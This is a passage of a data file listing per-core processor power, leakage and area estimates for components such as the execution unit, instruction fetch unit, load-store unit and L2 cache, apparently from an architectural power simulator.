'Execution Unit/Integer ALUs/Runtime Dynamic': 0.367404,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.11148,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0759158,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0119678,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.114311,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0885092,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.190227,
'Execution Unit/Register Files/Runtime Dynamic': 0.100477,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.296567,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.746537,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.23518,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00172664,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00172664,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.0015109,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00058872,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00127144,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00623563,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.016305,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0850862,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.41221,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.207506,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.288991,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.89741,
'Instruction Fetch Unit/Runtime Dynamic': 0.604123,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0392334,
'L2/Runtime Dynamic': 0.00836828,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.77778,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.70139,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.114549,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.114549,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.32091,
'Load Store Unit/Runtime Dynamic': 2.38085,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.282458,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.564916,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.100245,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.100834,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.336512,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.034007,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.668315,
'Memory Management Unit/Runtime Dynamic': 0.134841,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.599,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.264854,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0200685,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.167732,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.452654,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.81602,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0787304,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.264527,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.424947,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.490974,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.350462,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.606874,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.400147,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.35748,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.281267,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.384066,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.18751,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0802817,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0127045,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.121354,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0939578,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.201636,
'Execution Unit/Register Files/Runtime Dynamic': 0.106662,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.31481,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.792375,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.39609,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00181551,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00181551,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00158702,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000617489,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00134971,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00656775,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0172027,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0903241,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.74538,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.218765,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.306781,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.247,
'Instruction Fetch Unit/Runtime Dynamic': 0.639641,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0510915,
'L2/Runtime Dynamic': 0.0108015,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.99657,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.8063,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.121627,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.121627,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.57326,
'Load Store Unit/Runtime Dynamic': 2.52775,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.299912,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.599823,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.10644,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.107206,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.357227,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0358527,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.699739,
'Memory Management Unit/Runtime Dynamic': 0.143059,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 25.3203,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.280085,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0212911,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.178133,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.479509,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 7.19685,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0789439,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.264694,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.425997,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.491435,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.35196,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.609468,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.401759,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.36319,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.282587,
